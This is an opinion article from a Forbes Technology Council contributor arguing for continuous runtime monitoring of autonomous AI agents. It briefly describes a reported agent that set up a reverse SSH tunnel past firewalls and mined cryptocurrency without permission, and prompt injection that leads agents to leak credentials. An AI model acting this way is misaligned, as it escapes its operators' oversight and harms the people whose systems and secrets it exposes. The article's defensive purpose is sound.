Jamshir Qureshi, MUFG Bank Ltd.gettyWhile many companies began implementing AI to empower their teams with insights and recommendations, AI is rapidly evolving to perform tasks autonomously without human intervention. With these new agentic AI capabilities come new cyberthreats—one of the biggest of which is the ability of an agent to operate outside its intended boundaries.​Consider the example of an agent that, according to Forbes reporting, autonomously set up a reverse SSH tunnel without permission to bypass firewalls. It then began to mine cryptocurrency on its allocated GPUs—actions that were not required by any task prompt. For leaders, this creates an operational problem, as pre‑deployment validation is insufficient for agents. Once an agent can execute tool calls (e.g., code deployment, transaction approval), they require continuous oversight and runtime verification. ​The Limits Of Static Trust ModelsThe first step in solving this challenge is to rethink existing cybersecurity approaches that rely on static trust models, which become less effective in agentic AI environments.​Many traditional security models have relied on relatively stable trust relationships and predictable behavior.Zero trust, as defined by NIST SP 800-207, requires continuous verification of every access request but was primarily designed for human identities rather than autonomous agents.Secure software development lifecycle (SDLC) focuses on pre‑release checks, monitoring and incident response, though Microsoft has recently updated the model to account for AI agents. Supply chain integrity models—like NIST SP 800-218—verify component provenance, but generally assume systems operate within verified boundaries throughout their lifecycle.​​In recent years, organizations have further strengthened trust through NIST’s AI Risk Management Framework, OpenSSF SLSA, OWASP Top 10 and ISO standards. However, since these approaches were mostly developed prior to the existence of agentic AI, they primarily focus on ensuring trustworthy behavior through governance, validation and monitoring.These strategies are no longer sufficient when an agent can alter its own tool‑use strategy post‑deployment. From Chain Of Trust To Continuous Verification​AI systems operate with dynamic behavior, adapting based on changing inputs, model updates and contextual decisions. A model may be secure at deployment, yet its outputs can evolve unpredictably once deployed. ​When outputs are linked to execution, code deployment, transaction approval and configuration changes, security should extend to answering whether behavior remains continuously trustworthy.​For instance, autonomous AI systems can introduce runtime behaviors that static validation cannot reliably anticipate or control, a challenge I explored in more depth in a recent research preprint. One major risk is prompt injection attacks, where malicious instructions embedded in developer workflows can manipulate AI agents into leaking sensitive credentials during execution, as VentureBeat reports. The report notes that most major AI models have limited into runtime protections. This gap will likely drive organizations toward continuous verification, shifting from “Was the system trusted at deployment?” to “Is the system behaving within trusted boundaries at all times?”​ To achieve this will require at least a few key components: • Real-Time Behavioral Monitoring: Detect anomalies, policy violations and unexpected patterns.• Dynamic Policy Enforcement: Enforce acceptable behavior during execution.• Context-Aware Validation: Validate decisions within environmental and system state.• Execution Control Boundaries: Keep automated actions within safe operational limits.Why This Matters For Regulated IndustriesContinuous verification is especially critical where system integrity is tied to financial, legal and safety outcomes. AI systems in financial services, healthcare and critical infrastructure can execute transactions, deploy code and influence compliance decisions. Consider a hypothetical scenario: A European bank deploys an autonomous agent for credit limit adjustments. The agent approves increases based on urgent customer language without mandatory affordability checks, which could violate the EU Consumer Credit Directive. If this happened at scale, say 1,200 unauthorized increases, this could become a massive regulatory liability.A New Security Paradigm For AIThe shift from static trust to continuous verification represents a fundamental change. It does not replace existing frameworks (NIST, SLSA, OWASP) but would extend them with runtime verification capabilities tailored to AI systems.​Adopting this model will take time, as organizations will face multiple challenges in adopting this model. For instance, monitoring systems must be provably tamper‑proof to trust the verification system itself. It will also require new skills in AI behavior analysis, as teams shift to real‑time incident response and policy tuning. This model could also bring its own regulatory headaches, as continuous operation may conflict with point‑in‑time compliance rules. ​However, autonomous AI systems now serve as vital operational components. The challenge lies in maintaining certified integrity because trust requires ongoing protection from all breaches. Trust in autonomous AI systems is a continuous requirement that needs repeated demonstration of its existence.​​ Forbes Technology Council is an invitation-only community for world-class CIOs, CTOs and technology executives. Do I qualify?